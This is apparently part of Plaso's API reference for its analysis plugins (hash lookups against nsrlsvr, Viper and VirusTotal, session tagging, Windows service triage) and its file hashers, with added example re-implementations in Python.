        Deregisters an analysis plugin class. The analysis plugin classes are identified by their lower case name.
        Parameters: plugin_class (type) – class of the analysis plugin.
        Raises: KeyError – if an analysis plugin class is not set for the corresponding name.

    classmethod GetAllPluginInformation()
        Retrieves a list of the registered analysis plugins.
        Returns: the name, docstring and type string of each analysis plugin in alphabetical order.
        Return type: list[tuple[str, str, str]]

    classmethod GetPluginNames()
        Retrieves the analysis plugin names.
        Returns: analysis plugin names.
        Return type: list[str]

    classmethod GetPluginObjects(plugin_names)
        Retrieves the plugin objects.
        Parameters: plugin_names (list[str]) – names of plugins that should be retrieved.
        Returns: analysis plugins per name.
        Return type: dict[str, AnalysisPlugin]

    classmethod GetPlugins()
        Retrieves the registered analysis plugin classes.
        Yields: tuple – containing:
            str: name of the plugin
            type: plugin class

    classmethod RegisterPlugin(plugin_class)
        Registers an analysis plugin class. The analysis plugin classes are identified based on their lower case name.
        Parameters: plugin_class (type) – class of the analysis plugin.
        Raises: KeyError – if an analysis plugin class is already set for the corresponding name.


    classmethod RegisterPlugins(plugin_classes)
        Registers analysis plugin classes. The analysis plugin classes are identified based on their lower case name.
        Parameters: plugin_classes (list[type]) – classes of the analysis plugins.
        Raises: KeyError – if an analysis plugin class is already set for the corresponding name.

plaso.analysis.mediator module

The analysis plugin mediator object.

class plaso.analysis.mediator.AnalysisMediator(session, storage_writer, knowledge_base, data_location=None)
    Bases: object

    Analysis plugin mediator.

    last_activity_timestamp
        timestamp received that indicates the last time activity was observed. The last activity timestamp is updated when the mediator produces an attribute container, such as an event tag. This timestamp is used by the multi processing worker process to indicate the last time the worker was known to be active. This information is then used by the foreman to detect workers that are not responding (stalled).
        Type: int

    number_of_produced_analysis_reports
        number of produced analysis reports.
        Type: int

    number_of_produced_event_tags
        number of produced event tags.
        Type: int

    GetDisplayNameForPathSpec(path_spec)
        Retrieves the display name for a path specification.
        Parameters: path_spec (dfvfs.PathSpec) – path specification.
        Returns: human readable version of the path specification.
        Return type: str

    GetUsernameForPath(path)
        Retrieves a username for a specific path. This determines whether the path lies within a user's directory and, if so, returns the username of that user.
        Parameters: path (str) – path.
        Returns: username, or None if the path does not appear to be within a user's directory.
        Return type: str

    ProduceAnalysisReport(plugin)
        Produces an analysis report.
        Parameters: plugin (AnalysisPlugin) – plugin.


    ProduceAnalysisWarning(message, plugin_name)
        Produces an analysis warning.
        Parameters:
            • message (str) – message of the warning.
            • plugin_name (str) – name of the analysis plugin to which the warning applies.

    ProduceEventTag(event_tag)
        Produces an event tag.
        Parameters: event_tag (EventTag) – event tag.

    SignalAbort()
        Signals the analysis plugins to abort.

    property abort
        True if the analysis should be aborted.
        Type: bool

    property data_location
        path to the data files.
        Type: str

    property operating_system
        operating system or None if not set.
        Type: str

plaso.analysis.nsrlsvr module

Analysis plugin to look up file hashes in nsrlsvr and tag events.

class plaso.analysis.nsrlsvr.NsrlsvrAnalysisPlugin
    Bases: plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin

    Analysis plugin for looking up hashes in nsrlsvr.

    DATA_TYPES = ['fs:stat', 'fs:stat:ntfs']

    DEFAULT_LABEL = 'nsrl_present'

    GenerateLabels(hash_information)
        Generates a list of strings that will be used in the event tag.
        Parameters: hash_information (bool) – response from the hash tagging analyzer that indicates whether the file hash was present or not.
        Returns: list of labels to apply to event.
        Return type: list[str]

    NAME = 'nsrlsvr'

    SetHost(host)
        Sets the address or hostname of the server running nsrlsvr.
        Parameters: host (str) – IP address or hostname to query.

    SetLabel(label)
        Sets the tagging label.
        Parameters: label (str) – label to apply to events extracted from files that are present in nsrlsvr.


    SetPort(port)
        Sets the port where nsrlsvr is listening.
        Parameters: port (int) – port to query.

    TestConnection()
        Tests the connection to nsrlsvr.
        Returns: True if the nsrlsvr instance is reachable.
        Return type: bool

class plaso.analysis.nsrlsvr.NsrlsvrAnalyzer(hash_queue, hash_analysis_queue, **kwargs)
    Bases: plaso.analysis.hash_tagging.HashAnalyzer

    Analyzes file hashes by consulting an nsrlsvr instance.

    analyses_performed
        number of analysis batches completed by this analyzer.
        Type: int

    hashes_per_batch
        maximum number of hashes to analyze at once.
        Type: int

    seconds_spent_analyzing
        number of seconds this analyzer has spent performing analysis (as opposed to waiting on queues, etc.).
        Type: int

    wait_after_analysis
        number of seconds the analyzer will sleep for after analyzing a batch of hashes.
        Type: int

    Analyze(hashes)
        Looks up file hashes in nsrlsvr.
        Parameters: hashes (list[str]) – hash values to look up.
        Returns: analysis results, or an empty list on error.
        Return type: list[HashAnalysis]

    SUPPORTED_HASHES = ['md5', 'sha1']

    SetHost(host)
        Sets the address or hostname of the server running nsrlsvr.
        Parameters: host (str) – IP address or hostname to query.

    SetPort(port)
        Sets the port where nsrlsvr is listening.
        Parameters: port (int) – port to query.

    TestConnection()
        Tests the connection to nsrlsvr. Checks if a connection can be set up, then queries the server for the MD5 of an empty file and expects a response. The value of the response is not checked.
        Returns: True if the nsrlsvr instance is reachable.
        Return type: bool
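As an added example (not Plaso's own code), the following sketches the division of labour documented in the hash_tagging module above and the boolean-to-label step documented for the nsrlsvr plugin: an analyzer thread drains a hash queue in batches of hashes_per_batch, produces HashAnalysis objects, and the plugin side turns each result into labels. The in-memory reference set standing in for an nsrlsvr instance, the shortened queue wait, and the `SetLookupHashAnalyzer` and `TagHashes` names are assumptions of this example.

```python
import queue
import threading

# Constructed reference set standing in for an nsrlsvr instance (MD5 values).
KNOWN_GOOD_MD5 = {
    'd41d8cd98f00b204e9800998ecf8427e',  # MD5 of an empty file
    '0123456789abcdef0123456789abcdef',  # constructed value
}


class HashAnalysis(object):
    """Analysis information about a hash: the hash and what the lookup said."""

    def __init__(self, subject_hash, hash_information):
        self.subject_hash = subject_hash
        self.hash_information = hash_information


class SetLookupHashAnalyzer(threading.Thread):
    """Hypothetical HashAnalyzer: reads hash_queue in batches of
    hashes_per_batch, writes HashAnalysis objects to hash_analysis_queue and
    exits once SignalAbort() was called and the input queue is empty."""

    EMPTY_QUEUE_WAIT_TIME = 0.05  # seconds; the documented default is 4
    SUPPORTED_HASHES = ['md5']

    def __init__(self, hash_queue, hash_analysis_queue, reference_set,
                 hashes_per_batch=1, lookup_hash='md5'):
        super().__init__()
        self._abort = False
        self._hash_queue = hash_queue
        self._hash_analysis_queue = hash_analysis_queue
        self._reference_set = reference_set
        self.analyses_performed = 0
        self.hashes_per_batch = hashes_per_batch
        self.lookup_hash = None
        self.SetLookupHash(lookup_hash)

    def SetLookupHash(self, lookup_hash):
        # As documented: an unsupported hash name raises ValueError.
        if lookup_hash not in self.SUPPORTED_HASHES:
            raise ValueError('Unsupported lookup hash: {0:s}'.format(lookup_hash))
        self.lookup_hash = lookup_hash

    def SignalAbort(self):
        self._abort = True

    def Analyze(self, hashes):
        """Looks up one batch; hash_information is True when the hash is known."""
        return [HashAnalysis(h, h.lower() in self._reference_set) for h in hashes]

    def _GetBatch(self):
        batch = []
        while len(batch) < self.hashes_per_batch:
            try:
                batch.append(self._hash_queue.get(timeout=self.EMPTY_QUEUE_WAIT_TIME))
            except queue.Empty:
                break
        return batch

    def run(self):
        while True:
            batch = self._GetBatch()
            if not batch:
                if self._abort:
                    return
                continue
            for analysis in self.Analyze(batch):
                self._hash_analysis_queue.put(analysis)
            self.analyses_performed += 1


def GenerateLabels(hash_information, label='nsrl_present'):
    """Plugin side, as documented for nsrlsvr: a True lookup result yields
    the configured label, a False result yields no label."""
    return [label] if hash_information else []


def TagHashes(hashes, reference_set=KNOWN_GOOD_MD5, hashes_per_batch=2):
    """Runs the analyzer thread over hashes; returns ({hash: labels}, batches)."""
    hash_queue = queue.Queue()
    hash_analysis_queue = queue.Queue()
    for subject_hash in hashes:
        hash_queue.put(subject_hash)
    analyzer = SetLookupHashAnalyzer(
        hash_queue, hash_analysis_queue, reference_set,
        hashes_per_batch=hashes_per_batch)
    analyzer.start()
    analyzer.SignalAbort()  # stop after the queue has drained
    analyzer.join()
    labels = {}
    while not hash_analysis_queue.empty():
        analysis = hash_analysis_queue.get()
        labels[analysis.subject_hash] = GenerateLabels(analysis.hash_information)
    return labels, analyzer.analyses_performed
```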

plaso.analysis.sessionize module

A plugin to tag events according to rules in a tag file.

class plaso.analysis.sessionize.SessionizeAnalysisPlugin
    Bases: plaso.analysis.interface.AnalysisPlugin

    Analysis plugin that labels events by session.

    CompileReport(mediator)
        Compiles an analysis report.
        Parameters: mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
        Returns: analysis report.
        Return type: AnalysisReport

    ExamineEvent(mediator, event, event_data, event_data_stream)
        Analyzes an EventObject and tags it as part of a session.
        Parameters:
            • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
            • event (EventObject) – event to examine.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.

    NAME = 'sessionize'

    SetMaximumPause(maximum_pause_minutes)
        Sets the maximum pause interval between events to consider a session.
        Parameters: maximum_pause_minutes (int) – maximum gap between events that are part of the same session, in minutes.

plaso.analysis.tagging module

Analysis plugin that labels events according to rules in a tagging file.

class plaso.analysis.tagging.TaggingAnalysisPlugin
    Bases: plaso.analysis.interface.AnalysisPlugin

    Analysis plugin that labels events according to rules in a tagging file.

    ExamineEvent(mediator, event, event_data, event_data_stream)
        Labels events according to the rules in a tagging file.
        Parameters:
            • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
            • event (EventObject) – event to examine.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.

    NAME = 'tagging'


    SetAndLoadTagFile(tagging_file_path)
        Sets the tagging file to be used by the plugin.
        Parameters: tagging_file_path (str) – path of the tagging file.

plaso.analysis.test_memory module

Analysis plugin for testing exceeding memory consumption.

class plaso.analysis.test_memory.TestMemoryAnalysisPlugin
    Bases: plaso.analysis.interface.AnalysisPlugin

    Analysis plugin for testing memory consumption.

    CompileReport(mediator)
        Compiles an analysis report.
        Parameters: mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
        Returns: analysis report.
        Return type: AnalysisReport

    ExamineEvent(mediator, event, event_data, event_data_stream)
        Analyzes an event.
        Parameters:
            • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
            • event (EventObject) – event.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.

    NAME = 'test_memory'

    TEST_PLUGIN = True

plaso.analysis.unique_domains_visited module

A plugin to generate a list of domains visited.

class plaso.analysis.unique_domains_visited.UniqueDomainsVisitedPlugin
    Bases: plaso.analysis.interface.AnalysisPlugin

    A plugin to generate a list of all domains visited. This plugin will extract domains from browser history events extracted by Plaso. The list produced can be used to quickly determine if there has been a visit to a site of interest, for example, a known phishing site.

    ExamineEvent(mediator, event, event_data, event_data_stream)
        Analyzes an event and extracts domains from it. We only evaluate straightforward web history events, not visits which can be inferred by TypedURLs, cookies or other means.
        Parameters:
            • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.


            • event (EventObject) – event to examine.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.

    NAME = 'unique_domains_visited'

plaso.analysis.viper module

Analysis plugin to look up files in Viper and tag events.

class plaso.analysis.viper.ViperAnalysisPlugin
    Bases: plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin

    An analysis plugin for looking up SHA256 hashes in Viper.

    DATA_TYPES = ['pe:compilation:compilation_time']

    GenerateLabels(hash_information)
        Generates a list of labels that will be used in the event tag.
        Parameters: hash_information (dict[str, object]) – JSON decoded contents of the result of a Viper lookup, as produced by the ViperAnalyzer.
        Returns: list of labels to apply to events.
        Return type: list[str]

    NAME = 'viper'

    SetHost(host)
        Sets the address or hostname of the server running Viper.
        Parameters: host (str) – IP address or hostname to query.

    SetPort(port)
        Sets the port where the Viper server is listening.
        Parameters: port (int) – port to query.

    SetProtocol(protocol)
        Sets the protocol that will be used to query Viper.
        Parameters: protocol (str) – protocol to use to query Viper. Either ‘http’ or ‘https’.
        Raises: ValueError – if the protocol is not supported.

    TestConnection()
        Tests the connection to the Viper server.
        Returns: True if the Viper server instance is reachable.
        Return type: bool

class plaso.analysis.viper.ViperAnalyzer(hash_queue, hash_analysis_queue, **kwargs)
    Bases: plaso.analysis.hash_tagging.HTTPHashAnalyzer

    Class that analyzes file hashes by consulting Viper. REST API reference: https://viper-framework.readthedocs.io/en/latest/usage/web.html#api

    Analyze(hashes)
        Looks up hashes in Viper using the Viper HTTP API.
        Parameters: hashes (list[str]) – hashes to look up.


        Returns: hash analysis.
        Return type: list[HashAnalysis]
        Raises: RuntimeError – if no host has been set for Viper.

    SUPPORTED_HASHES = ['md5', 'sha256']

    SUPPORTED_PROTOCOLS = ['http', 'https']

    SetHost(host)
        Sets the address or hostname of the server running Viper.
        Parameters: host (str) – IP address or hostname to query.

    SetPort(port)
        Sets the port where the Viper server is listening.
        Parameters: port (int) – port to query.

    SetProtocol(protocol)
        Sets the protocol that will be used to query Viper.
        Parameters: protocol (str) – protocol to use to query Viper. Either ‘http’ or ‘https’.
        Raises: ValueError – if the protocol is not supported.

    TestConnection()
        Tests the connection to the Viper server.
        Returns: True if the Viper server instance is reachable.
        Return type: bool

plaso.analysis.virustotal module

Analysis plugin to look up files in VirusTotal and tag events.

class plaso.analysis.virustotal.VirusTotalAnalysisPlugin
    Bases: plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin

    An analysis plugin for looking up hashes in VirusTotal.

    DATA_TYPES = ['pe:compilation:compilation_time']

    EnableFreeAPIKeyRateLimit()
        Configures rate limiting for queries to VirusTotal. The default rate limit for free VirusTotal API keys is 4 requests per minute.

    GenerateLabels(hash_information)
        Generates a list of strings that will be used in the event tag.
        Parameters: hash_information (dict[str, object]) – the JSON decoded contents of the result of a VirusTotal lookup, as produced by the VirusTotalAnalyzer.
        Returns: strings describing the results from VirusTotal.
        Return type: list[str]

    NAME = 'virustotal'

    SetAPIKey(api_key)
        Sets the VirusTotal API key to use in queries.
        Parameters: api_key (str) – VirusTotal API key.


    TestConnection()
        Tests the connection to VirusTotal.
        Returns: True if VirusTotal is reachable.
        Return type: bool

class plaso.analysis.virustotal.VirusTotalAnalyzer(hash_queue, hash_analysis_queue, **kwargs)
    Bases: plaso.analysis.hash_tagging.HTTPHashAnalyzer

    Class that analyzes file hashes by consulting VirusTotal. The API is documented here: https://developers.virustotal.com/reference

    Analyze(hashes)
        Looks up hashes in VirusTotal using the VirusTotal HTTP API.
        Parameters: hashes (list[str]) – hashes to look up.
        Returns: analysis results.
        Return type: list[HashAnalysis]
        Raises: RuntimeError – if the VirusTotal API key has not been set.

    SUPPORTED_HASHES = ['md5', 'sha1', 'sha256']

    SetAPIKey(api_key)
        Sets the VirusTotal API key to use in queries.
        Parameters: api_key (str) – VirusTotal API key.

    TestConnection()
        Tests the connection to VirusTotal.
        Returns: True if VirusTotal is reachable.
        Return type: bool

plaso.analysis.windows_services module

A plugin to enable quick triage of Windows Services.

class plaso.analysis.windows_services.WindowsService(*args: Any, **kwargs: Any)
    Bases: yaml.

    Class to represent a Windows Service.

    image_path
        value of the ImagePath value of the service key.
        Type: str

    name
        name of the service.
        Type: str

    object_name
        value of the ObjectName value of the service key.
        Type: str

    service_dll
        value of the ServiceDll value in the service's Parameters subkey.


        Type: str

    service_type
        value of the Type value of the service key.
        Type: int

    source
        tuple containing the path and registry key describing where the service was found.
        Type: tuple[str, str]

    start_type
        value of the Start value of the service key.
        Type: int

    COMPARE_EXCLUDE = frozenset({'sources'})

    classmethod FromEventData(event_data, event_data_stream)
        Creates a service object from event data.
        Parameters:
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.
        Returns: service.
        Return type: WindowsService

    HumanReadableStartType()
        Returns a human readable string describing the start type value.
        Returns: human readable description of the start type value.
        Return type: str

    HumanReadableType()
        Returns a human readable string describing the type value.
        Returns: human readable description of the type value.
        Return type: str

    __eq__(other_service)
        Custom equality method so that near-duplicates match. Compares two service objects and evaluates whether they are the same, or close enough to be considered to represent the same service. For two service objects to be considered the same they need to have the same set of attributes and the same values for all their attributes, other than those enumerated as reserved in the COMPARE_EXCLUDE constant.
        Parameters: other_service (WindowsService) – service we are testing for equality.
        Returns: whether the services are equal.
        Return type: bool

    yaml_tag = '!WindowsService'

class plaso.analysis.windows_services.WindowsServiceCollection
    Bases: object

    Class to hold and de-duplicate Windows Services.


    AddService(new_service)
        Adds a new service to the list of ones we know about.
        Parameters: new_service (WindowsService) – the service to add.

    property services
        services in this collection.
        Type: list[WindowsService]

class plaso.analysis.windows_services.WindowsServicesAnalysisPlugin
    Bases: plaso.analysis.interface.AnalysisPlugin

    Provides a single list of Windows services found in the Registry.

    CompileReport(mediator)
        Compiles an analysis report.
        Parameters: mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
        Returns: report.
        Return type: AnalysisReport

    ExamineEvent(mediator, event, event_data, event_data_stream)
        Analyzes an event and creates Windows Services as required. At present, this method only handles events extracted from the Registry.
        Parameters:
            • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
            • event (EventObject) – event to examine.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.

    NAME = 'windows_services'

    SetOutputFormat(output_format)
        Sets the output format of the generated report.
        Parameters: output_format (str) – format the plugin should use to produce its output.
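Added example, not Plaso's code: a re-implementation of the WindowsService near-duplicate equality (every attribute compared except those in COMPARE_EXCLUDE) and the WindowsServiceCollection de-duplication described above, run over constructed Registry-event dicts rather than Plaso EventData. The start and type labels follow the standard Windows Start and Type values; the `BuildCollection` helper and `SAMPLE_EVENTS` are this example's own.

```python
# Standard Windows values of the Start and Type values under a service key.
_START_TYPES = {0: 'Boot', 1: 'System', 2: 'Auto Start', 3: 'Manual', 4: 'Disabled'}
_SERVICE_TYPES = {1: 'Kernel Device Driver', 2: 'File System Driver',
                  16: 'Service - Own Process', 32: 'Service - Share Process'}


class WindowsService(object):
    """A Windows service reconstructed from Registry events."""

    # Attributes ignored by __eq__, so differing sources still compare equal.
    COMPARE_EXCLUDE = frozenset({'sources'})

    def __init__(self, name, service_type, image_path, start_type,
                 object_name=None, service_dll=None, source=None):
        self.name = name
        self.service_type = service_type
        self.image_path = image_path
        self.start_type = start_type
        self.object_name = object_name
        self.service_dll = service_dll
        # Every (file path, Registry key) pair this service was observed at.
        self.sources = [source] if source else []

    @classmethod
    def FromEventData(cls, event_data, event_data_stream):
        """Builds a service from a constructed Registry-event dict (not Plaso's
        EventData); ServiceDll would come from the Parameters subkey."""
        values = event_data['values']
        return cls(
            name=event_data['key_path'].rsplit('\\', 1)[-1],
            service_type=values.get('Type'),
            image_path=values.get('ImagePath'),
            start_type=values.get('Start'),
            object_name=values.get('ObjectName'),
            service_dll=values.get('ServiceDll'),
            source=(event_data_stream['path'], event_data['key_path']))

    def HumanReadableStartType(self):
        return _START_TYPES.get(self.start_type, 'Unknown: {0!s}'.format(self.start_type))

    def HumanReadableType(self):
        return _SERVICE_TYPES.get(self.service_type, 'Unknown: {0!s}'.format(self.service_type))

    def __eq__(self, other_service):
        """Near-duplicate match: every attribute outside COMPARE_EXCLUDE is equal."""
        if not isinstance(other_service, WindowsService):
            return NotImplemented
        names = (set(vars(self)) | set(vars(other_service))) - self.COMPARE_EXCLUDE
        return all(getattr(self, n, None) == getattr(other_service, n, None) for n in names)

    __hash__ = None  # custom equality over mutable state: not hashable


class WindowsServiceCollection(object):
    """Holds services, folding near-duplicates into one entry."""

    def __init__(self):
        self._services = []

    def AddService(self, new_service):
        for known_service in self._services:
            if known_service == new_service:
                known_service.sources.extend(new_service.sources)
                return
        self._services.append(new_service)

    @property
    def services(self):
        return self._services


def BuildCollection(events):
    """events: iterable of constructed (event_data, event_data_stream) pairs."""
    collection = WindowsServiceCollection()
    for event_data, event_data_stream in events:
        collection.AddService(WindowsService.FromEventData(event_data, event_data_stream))
    return collection


# Constructed sample: the Spooler key from the live SYSTEM hive and from its
# RegBack copy (identical, so merged), then a Spooler entry whose ImagePath
# differs and therefore stays a separate entry for the analyst to review.
_SPOOLER_KEY = 'HKLM\\SYSTEM\\ControlSet001\\Services\\Spooler'
_SPOOLER_VALUES = {'Type': 16, 'Start': 2, 'ObjectName': 'LocalSystem',
                   'ImagePath': 'C:\\Windows\\System32\\spoolsv.exe'}
SAMPLE_EVENTS = [
    ({'key_path': _SPOOLER_KEY, 'values': _SPOOLER_VALUES},
     {'path': '\\Windows\\System32\\config\\SYSTEM'}),
    ({'key_path': _SPOOLER_KEY, 'values': _SPOOLER_VALUES},
     {'path': '\\Windows\\System32\\config\\RegBack\\SYSTEM'}),
    ({'key_path': _SPOOLER_KEY,
      'values': dict(_SPOOLER_VALUES, ImagePath='C:\\Users\\Public\\spoolsv.exe')},
     {'path': '\\Windows\\System32\\config\\SYSTEM'}),
]
```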

Module contents

This file imports Python modules that register analysis plugins.

5.1.2 plaso.analyzers package

Subpackages

plaso.analyzers.hashers package

Submodules


plaso.analyzers.hashers.entropy module

The entropy calculation implementation.

class plaso.analyzers.hashers.entropy.EntropyHasher
    Bases: plaso.analyzers.hashers.interface.BaseHasher

    Calculates the entropy of input files.

    ATTRIBUTE_NAME = 'file_entropy'

    DESCRIPTION = 'Calculates the byte entropy of input data.'

    GetStringDigest()
        Calculates the byte entropy value. Byte entropy is a value between 0.0 and 8.0, and is returned as a string to match the Plaso analyzer and storage APIs.
        Returns: byte entropy formatted as a floating point number with 6 decimal places, calculated over the data blocks passed to Update().
        Return type: str

    NAME = 'entropy'

    Update(data)
        Updates the state of the entropy calculator with a new block of data. Repeated calls to update are equivalent to one single call with the concatenation of the arguments.
        Parameters: data () – block of data with which to update the context of the entropy calculator.

plaso.analyzers.hashers.interface module

The hasher interface.

class plaso.analyzers.hashers.interface.BaseHasher
    Bases: object

    Base class for objects that calculate hashes.

    ATTRIBUTE_NAME = 'hash'

    DESCRIPTION = 'Calculates a digest hash over input data.'

    abstract GetStringDigest()
        Retrieves the digest of the hash function expressed as a Unicode string.
        Returns: string hash digest calculated over the data blocks passed to Update(). The string consists of printable Unicode characters.
        Return type: str

    NAME = 'base_hasher'

    abstract Update(data)
        Updates the current state of the hasher with a new block of data. Repeated calls to update are equivalent to one single call with the concatenation of the arguments.


        Parameters: data (bytes) – data with which to update the context of the hasher.

plaso.analyzers.hashers.manager module

This file contains a class for managing digest hashers for Plaso.

class plaso.analyzers.hashers.manager.HashersManager
    Bases: object

    Class that implements the hashers manager.

    classmethod DeregisterHasher(hasher_class)
        Deregisters a hasher class. The hasher classes are identified based on their lower case name.
        Parameters: hasher_class (type) – class object of the hasher.
        Raises: KeyError – if hasher class is not set for the corresponding name.

    classmethod GetHasher(hasher_name)
        Retrieves an instance of a specific hasher.
        Parameters: hasher_name (str) – the name of the hasher to retrieve.
        Returns: hasher.
        Return type: BaseHasher
        Raises: KeyError – if hasher class is not set for the corresponding name.

    classmethod GetHasherClasses(hasher_names=None)
        Retrieves the registered hashers.
        Parameters: hasher_names (list[str]) – names of the hashers to retrieve.
        Yields: tuple – containing:
            str: parser name
            type: next hasher class.

    classmethod GetHasherNames()
        Retrieves the names of all loaded hashers.
        Returns: hasher names.
        Return type: list[str]

    classmethod GetHasherNamesFromString(hasher_names_string)
        Retrieves a list of hasher names from a comma separated string. Takes a string of comma separated hasher names and transforms it into a list of hasher names.
        Parameters: hasher_names_string (str) – comma separated names of hashers to enable, the string ‘all’ to enable all hashers or ‘none’ to disable all hashers.
        Returns: names of valid hashers from the string, or an empty list if no valid names are found.
        Return type: list[str]

    classmethod GetHashers(hasher_names)
        Retrieves instances for all the specified hashers.


        Parameters: hasher_names (list[str]) – names of the hashers to retrieve.
        Returns: hashers.
        Return type: list[BaseHasher]

    classmethod GetHashersInformation()
        Retrieves the hashers information.
        Returns: containing:
            str: hasher name.
            str: hasher description.
        Return type: list[tuple]

    classmethod RegisterHasher(hasher_class)
        Registers a hasher class. The hasher classes are identified based on their lower case name.
        Parameters: hasher_class (type) – class object of the hasher.
        Raises: KeyError – if hasher class is already set for the corresponding name.

plaso.analyzers.hashers.md5 module

The MD5 hasher implementation.

class plaso.analyzers.hashers.md5.MD5Hasher
    Bases: plaso.analyzers.hashers.interface.BaseHasher

    This class provides MD5 hashing functionality.

    ATTRIBUTE_NAME = 'md5_hash'

    DESCRIPTION = 'Calculates an MD5 digest hash over input data.'

    GetStringDigest()
        Returns the digest of the hash function expressed as a Unicode string.
        Returns: string hash digest calculated over the data blocks passed to Update(). The string consists of printable Unicode characters.
        Return type: str

    NAME = 'md5'

    Update(data)
        Updates the current state of the hasher with a new block of data. Repeated calls to update are equivalent to one single call with the concatenation of the arguments.
        Parameters: data (bytes) – block of data with which to update the context of the hasher.
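Added example, not Plaso's code: a re-implementation of the hasher interface, the entropy hasher (byte entropy between 0.0 and 8.0, 6 decimal places, incremental Update()) and the MD5 hasher described in the preceding modules, together with a HashersManager that registers classes by lower-case NAME and resolves the ‘all’, ‘none’ and comma separated strings documented for GetHasherNamesFromString. Class names mirror the documented ones; the `HashData` helper is this example's own.

```python
import hashlib
import math


class BaseHasher(object):
    """Stand-in for the documented hasher interface."""
    ATTRIBUTE_NAME = 'hash'
    DESCRIPTION = 'Calculates a digest hash over input data.'
    NAME = 'base_hasher'

    def GetStringDigest(self):
        raise NotImplementedError()

    def Update(self, data):
        raise NotImplementedError()


class EntropyHasher(BaseHasher):
    """Byte entropy in [0.0, 8.0]. Update() accumulates byte counts, so
    repeated calls equal one call over the concatenated data."""
    ATTRIBUTE_NAME = 'file_entropy'
    DESCRIPTION = 'Calculates the byte entropy of input data.'
    NAME = 'entropy'

    def __init__(self):
        self._counts = [0] * 256
        self._size = 0

    def Update(self, data):
        for byte in data:
            self._counts[byte] += 1
        self._size += len(data)

    def GetStringDigest(self):
        entropy = 0.0
        for count in self._counts:
            if count:
                probability = count / self._size
                entropy -= probability * math.log2(probability)
        # A string, to match the analyzer and storage APIs.
        return '{0:.6f}'.format(entropy)


class MD5Hasher(BaseHasher):
    ATTRIBUTE_NAME = 'md5_hash'
    DESCRIPTION = 'Calculates an MD5 digest hash over input data.'
    NAME = 'md5'

    def __init__(self):
        self._md5_context = hashlib.md5()

    def Update(self, data):
        self._md5_context.update(data)

    def GetStringDigest(self):
        return self._md5_context.hexdigest()


class HashersManager(object):
    """Registry of hasher classes keyed by lower-case NAME."""
    _hasher_classes = {}

    @classmethod
    def RegisterHasher(cls, hasher_class):
        name = hasher_class.NAME.lower()
        if name in cls._hasher_classes:
            raise KeyError('Hasher class already set for name: {0:s}.'.format(name))
        cls._hasher_classes[name] = hasher_class

    @classmethod
    def GetHasherNamesFromString(cls, hasher_names_string):
        """'all' selects every registered hasher, 'none' selects nothing, and
        otherwise comma separated names are kept only if registered."""
        selection = (hasher_names_string or '').strip().lower()
        if not selection or selection == 'none':
            return []
        if selection == 'all':
            return sorted(cls._hasher_classes)
        names = [name.strip() for name in selection.split(',')]
        return [name for name in names if name in cls._hasher_classes]

    @classmethod
    def GetHashers(cls, hasher_names):
        return [cls._hasher_classes[name]() for name in hasher_names]


HashersManager.RegisterHasher(EntropyHasher)
HashersManager.RegisterHasher(MD5Hasher)


def HashData(hasher_names_string, blocks):
    """Feeds blocks through the selected hashers; returns {ATTRIBUTE_NAME: digest}."""
    hashers = HashersManager.GetHashers(
        HashersManager.GetHasherNamesFromString(hasher_names_string))
    for hasher in hashers:
        for block in blocks:
            hasher.Update(block)
    return {hasher.ATTRIBUTE_NAME: hasher.GetStringDigest() for hasher in hashers}
```

A file of uniform bytes scores 0.000000 and one containing every byte value equally often scores 8.000000, which is why a high entropy value is a useful triage hint for compressed, encrypted or packed content.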


plaso.analyzers.hashers.sha1 module

The SHA-1 hasher implementation.

class plaso.analyzers.hashers.sha1.SHA1Hasher
    Bases: plaso.analyzers.hashers.interface.BaseHasher

    This class provides SHA-1 hashing functionality.

    ATTRIBUTE_NAME = 'sha1_hash'

    DESCRIPTION = 'Calculates a SHA-1 digest hash over input data.'

    GetStringDigest()
        Returns the digest of the hash function expressed as a Unicode string.
        Returns: string hash digest calculated over the data blocks passed to Update(). The string consists of printable Unicode characters.
        Return type: str

    NAME = 'sha1'

    Update(data)
        Updates the current state of the hasher with a new block of data. Repeated calls to update are equivalent to one single call with the concatenation of the arguments.
        Parameters: data (bytes) – block of data with which to update the context of the hasher.

plaso.analyzers.hashers.sha256 module

The SHA-256 hasher implementation.

class plaso.analyzers.hashers.sha256.SHA256Hasher
    Bases: plaso.analyzers.hashers.interface.BaseHasher

    This class provides SHA-256 hashing functionality.

    ATTRIBUTE_NAME = 'sha256_hash'

    DESCRIPTION = 'Calculates a SHA-256 digest hash over input data.'

    GetStringDigest()
        Returns the digest of the hash function expressed as a Unicode string.
        Returns: string hash digest calculated over the data blocks passed to Update(). The string consists of printable Unicode characters.
        Return type: str

    NAME = 'sha256'

    Update(data)
        Updates the current state of the hasher with a new block of data. Repeated calls to update are equivalent to one single call with the concatenation of the arguments.
        Parameters: data (bytes) – block of data with which to update the context of the hasher.


Module contents

This file imports Python modules that register hashers.

Submodules

plaso.analyzers.hashing_analyzer module

The hashing analyzer implementation.

class plaso.analyzers.hashing_analyzer.HashingAnalyzer
    Bases: plaso.analyzers.interface.BaseAnalyzer

    This class contains code for calculating file hashes of input files. In Plaso, hashers are classes that map arbitrarily sized file content to a fixed size value. See: https://en.wikipedia.org/wiki/Hash_function

    Analyze(data)
        Updates the internal state of the analyzer, processing a block of data. Repeated calls are equivalent to a single call with the concatenation of all the arguments.
        Parameters: data (bytes) – block of data from the data stream.

    DESCRIPTION = 'Calculates hashes of file content.'

    GetResults()
        Retrieves the hashing results.
